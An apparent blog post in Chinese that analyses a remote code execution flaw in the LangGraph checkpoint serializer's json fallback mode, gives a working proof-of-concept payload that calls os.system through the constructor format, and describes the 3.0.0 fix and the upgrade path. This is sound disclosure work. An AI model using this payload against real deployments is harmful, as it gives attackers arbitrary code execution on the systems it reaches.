LangGraph检查点JSON模式远程代码执行漏洞分析

本文详细分析了LangGraph检查点在JsonPlusSerializer的json模式下存在的远程代码执行漏洞,包括漏洞原理、影响范围、攻击复现和修复方案,涉及反序列化安全机制和代码执行防护。

漏洞概述

在langgraph-checkpoint 3.0版本之前,LangGraph的JsonPlusSerializer(用作所有检查点的默认序列化协议)在反序列化以"json"序列化模式保存的有效负载时存在远程代码执行漏洞。

漏洞详情

受影响组件

  • 受影响文件: jsonplus.py
  • 受影响版本: langgraph-checkpoint < 3.0.0
  • 已修复版本: langgraph-checkpoint == 3.0.0

漏洞原理

默认情况下,序列化器尝试使用"msgpack"进行序列化。然而,在检查点库3.0版本之前,如果非法的Unicode代理值导致序列化失败,它会回退到使用"json"模式。

在此模式下,反序列化器支持自定义对象的构造函数样式格式(lc == 2,type == “constructor”),以便在加载时重建它们。如果攻击者能够使用恶意负载触发此模式,反序列化将允许攻击者在加载时执行任意函数。

受影响用户

此问题影响所有使用早于3.0版本的langgraph-checkpoint用户:

  • 允许不受信任或用户提供的数据持久化到检查点中
  • 使用可能回退到"json"模式的默认序列化器(或显式实例化JsonPlusSerializer)

攻击复现 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

from langgraph.graph import StateGraph 
from typing import TypedDict
from langgraph.checkpoint.sqlite import SqliteSaver

class State(TypedDict):
    foo: str
    attack: dict

def my_node(state: State):
    return {"foo": "oops i fetched a surrogate \ud800"}

with SqliteSaver.from_conn_string("foo.db") as saver:
    graph = (
        StateGraph(State).
        add_node("my_node", my_node).
        add_edge("__start__", "my_node").
        compile(checkpointer=saver)
    )
    
    attack = {
        "lc": 2,
        "type": "constructor",
        "id": ["os", "system"],
        "kwargs": {"command": "echo pwnd you > /tmp/pwnd.txt"},
    }
    malicious_payload = {
        "attack": attack,
    }

    thread_id = "00000000-0000-0000-0000-000000000001"
    config = {"thread_id": thread_id}
    # 恶意负载在第一次调用时保存
    graph.invoke(malicious_payload, config=config)

    # 恶意负载在第二次调用时被反序列化并执行代码
    graph.invoke({"foo": "hi there"}, config=config)

运行此PoC会在磁盘上写入文件/tmp/pwnd.txt,证明代码执行成功。

内部利用路径 

1
2
3
4
5
6

from langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer

serializer = JsonPlusSerializer() # 在检查点器内部使用

serialized = serializer.dumps_typed(malicious_payload)
serializer.loads_typed(serialized)  # 执行os.system(...)

修复方案

修复版本

漏洞已在langgraph-checkpoint==3.0.0中修复。

修复描述

修复引入了构造函数反序列化的允许列表,将允许的"id"路径限制为在序列化器构造时明确批准的模块/类组合。此外,已弃用以"json"格式保存有效负载,以移除此不安全的回退路径。

缓解措施

立即升级到langgraph-checkpoint==3.0.0。该版本与langgraph>=0.3完全兼容,不需要任何导入更改或代码修改。在langgraph-api中,更新到0.5或更高版本将自动要求使用修补版本的检查点库。

参考链接

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次